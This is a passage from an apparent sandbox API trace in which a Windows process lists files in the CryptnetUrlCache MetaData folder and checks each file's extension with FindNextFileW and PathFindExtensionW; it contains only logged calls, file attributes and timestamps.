cAlternateFileName="4C8F84~1")) returned 1 [0241.418] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4C8F841FB02DEC8C10108028DB86A08D_8DAFFFD2D43BDC7A1717F5B61C303398") returned="" [0241.418] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x7295ee20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x7295ee20, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xadfb2060, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9", cAlternateFileName="4DD397~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\4DD39726D4B55AC3B4119B35A893323C_46CCCFB940A93F39A734F69EFCDD76E9") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf8b9fd0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf8b9fd0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf8b9fd0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77", cAlternateFileName="5080DC~2")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_2908F682DFC81A793BD240CF29711C77") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf86dd10, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf86dd10, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf86dd10, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x190, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220", cAlternateFileName="5080DC~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5080DC7A65DB6A5960ECD874088F3328_6CBA2C06D5985DD95AE59AF8FC7C6220") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf7af630, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4", cAlternateFileName="5457A8~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\5457A8CE4B2A7499F8299A013B6E1C7C_CE50F893881D43DC0C815E4D80FAF2B4") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xed9b0820, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xed9b0820, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xed9b0820, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0xf4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="696F3DE637E6DE85B458996D49D759AD", cAlternateFileName="696F3D~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\696F3DE637E6DE85B458996D49D759AD") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf763370, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf763370, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf763370, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21", cAlternateFileName="705A76~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\705A76DE71EA2CAEBB8F0907449CE086_9752C5B2D53EE7A19F7764B52968EC21") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xedb2d5e0, ftCreationTime.dwHighDateTime=0x1d2e620, ftLastAccessTime.dwLowDateTime=0xedb2d5e0, ftLastAccessTime.dwHighDateTime=0x1d2e620, ftLastWriteTime.dwLowDateTime=0xedb2d5e0, ftLastWriteTime.dwHighDateTime=0x1d2e620, nFileSizeHigh=0x0, nFileSizeLow=0x100, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7396C420A8E1BC1DA97F1AF0D10BAD21", cAlternateFileName="7396C4~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7396C420A8E1BC1DA97F1AF0D10BAD21") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x540c1170, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x540c1170, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x312640, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x1b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6", cAlternateFileName="7423F8~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd48e2bf0, ftLastWriteTime.dwHighDateTime=0x1d2dda1, nFileSizeHigh=0x0, nFileSizeLow=0xdc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B2238AACCEDC3F1FFE8E7EB5F575EC9", cAlternateFileName="7B2238~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b2324c0, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b2324c0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b2324c0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D", cAlternateFileName="7B8944~1")) returned 1 [0241.419] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B8944BA8AD0EFDF0E01A43EF62BECD0_B2DB1CC4B5F2D2A802D56AAED525802D") returned="" [0241.419] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6b199f40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x6b199f40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x6b199f40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6", cAlternateFileName="7D266D~2")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xefaf7160, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xefaf7160, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xaec313e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x198, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", cAlternateFileName="7D266D~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6056b480, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6056b480, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x1ef687a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", cAlternateFileName="8059E9~3")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x611ea800, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x611ea800, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaecc9960, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", cAlternateFileName="80273C~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x58e24200, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x58e24200, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9f5f40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", cAlternateFileName="8059E9~2")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61236ac0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61236ac0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x3b0b01a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", cAlternateFileName="809279~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x5836df00, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5836df00, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f739c0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4", cAlternateFileName="8059E9~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_5EA65844B9EF5670A9C002CBD85B10A4") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x62378a40, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x62378a40, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xae9a9c80, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778", cAlternateFileName="80E4BE~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_74E943F7DAB6D19E37E4854057155778") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x613675c0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x613675c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x69bba4a0, ftLastWriteTime.dwHighDateTime=0x1d2e621, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED", cAlternateFileName="803B9E~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_C080DA2AE431C1A7F3B0C147EEB043ED") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x63c50fe0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x63c50fe0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb100bf40, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E", cAlternateFileName="803D37~1")) returned 1 [0241.421] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_E907D7A04657714B5B06D18BC920971E") returned="" [0241.421] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x61021780, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x61021780, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb1058200, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30", cAlternateFileName="8059E9~4")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F2318F7AB33980A131A265454C39CA30") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x636a9ba0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x636a9ba0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb139e040, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB", cAlternateFileName="800D31~1")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8059E9A0D314877E40FE93D8CCFB3C69_F6E15778DC8E326895C606FBFA0392EB") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x581f7ea0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x581f7ea0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xb0f4d860, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56", cAlternateFileName="828298~1")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\828298824EA5549947C17DDABF6871F5_0206EFBC540300C3BF0163CDBC3D7D56") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xec3c5340, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xec3c5340, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xb16257a0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F", cAlternateFileName="8828F3~1")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_3DF94EB797096674F7793A562A778C5F") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x8064ac00, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x8064ac00, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x80670d60, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416", cAlternateFileName="8828F3~2")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8828F39C7C0CE9A14B25C7EB321181BA_C6EF73E4482B2588B1252D1A64B99416") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6aa2c0a0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6aa2c0a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xadf19ae0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x196, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61", cAlternateFileName="8E4E51~1")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\8E4E510F44A56B8C8ECFEC352907C373_411140098D71F028134E9B8A21255C61") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x28dbdd20, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28dbdd20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbf0dd70, ftLastWriteTime.dwHighDateTime=0x1d35d06, nFileSizeHigh=0x0, nFileSizeLow=0x156, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="94308059B57B3142E455B38A6EB92015", cAlternateFileName="943080~1")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0x6a83cec0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6a83cec0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaebe5120, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x194, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9", cAlternateFileName="955CAB~1")) returned 1 [0241.422] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\955CAB6FF6A24D5820D50B5BA1CF79C7_AD9E7615297A3A83320AACE5801A04F9") returned="" [0241.422] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xbf3f73d0, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf3f73d0, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf3f73d0, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6", cAlternateFileName="9BC2FF~1")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\9BC2FFC5D9591E1BD3545230E9B7CC36_CF30943571F9BEE96C487B2D9F0436E6") returned="" [0241.423] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x2024, ftCreationTime.dwLowDateTime=0xe06277d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe06277d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xb15d94e0, ftLastWriteTime.dwHighDateTime=0x1d2e675, nFileSizeHigh=0x0, nFileSizeLow=0x182, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9C888BEABCCBC2A97B0D6D9214C3BA37_1213DC6F71E4C3B05E7BCEEBC203A31E", cAlternateFileName="9C888B~1")) returned 1 [0241.423] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS 